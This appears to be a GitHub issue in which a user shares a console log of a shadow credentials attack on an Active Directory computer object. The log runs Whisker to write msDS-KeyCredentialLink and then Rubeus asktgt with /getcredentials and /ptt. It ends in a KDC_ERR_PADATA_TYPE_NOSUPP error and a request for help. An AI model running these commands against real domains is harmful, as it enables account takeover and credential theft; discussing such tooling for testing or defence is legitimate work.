Skip to content

[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP shadow credential attack on computer object #220

New issue
New issue
Open
Open
[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP shadow credential attack on computer object#220
@mrcnpp

Description

@mrcnpp
mrcnpp
opened on Dec 28, 2025
Process 5800 created.
Channel 3 created.
Microsoft Windows [Version 10.0.20348.2849]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\Windows\Tasks
cd C:\Windows\Tasks

C:\Windows\Tasks>.\Whisker.exe clear /target:target$ /domain:domain.local /dc:dc.domain.tld
.\Whisker.exe clear /target:target$ /domain:domain.local /dc:dc.domain.tld
[*] Searching for the target account
[*] Target user found: CN=target1,CN=Computers,DC=domain,DC=tld
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object

C:\Windows\Tasks>.\Whisker.exe add /target:target$ /domain:domain.local /dc:dc.domain.tld
.\Whisker.exe add /target:target$ /domain:domain.local /dc:dc.domain.tld
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password Akd98WkcpFnq0UBY
[*] Searching for the target account
[*] Target user found: CN=target$,CN=Computers,DC=domain,DC=tld
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID ed51852e-b8f8-4a60-a7f1-c744e74da321
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:target$ /certificate:MIIJ0AIBAzCCC<snip> /password:"Akd98WkcpFnq0UBY" /domain:domain.tld /dc:dc.domain.tld /getcredentials /show

C:\Windows\Tasks>Rubeus.exe asktgt /user:target$ /certificate:MIIJ0AIBAzCCC<snip> /password:"Akd98WkcpFnq0UBY" /domain:domain.tld /dc:dc.domain.tld /getcredentials /show /ptt

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3 

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=ZPH-target$ 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'domain.local\target$'
[*] Using domain controller: 192.168.210.10:88

[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

I'm trying to exploit a computer object using shodow credential.
Anyone have any idea why I'm getting the error showed above?

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions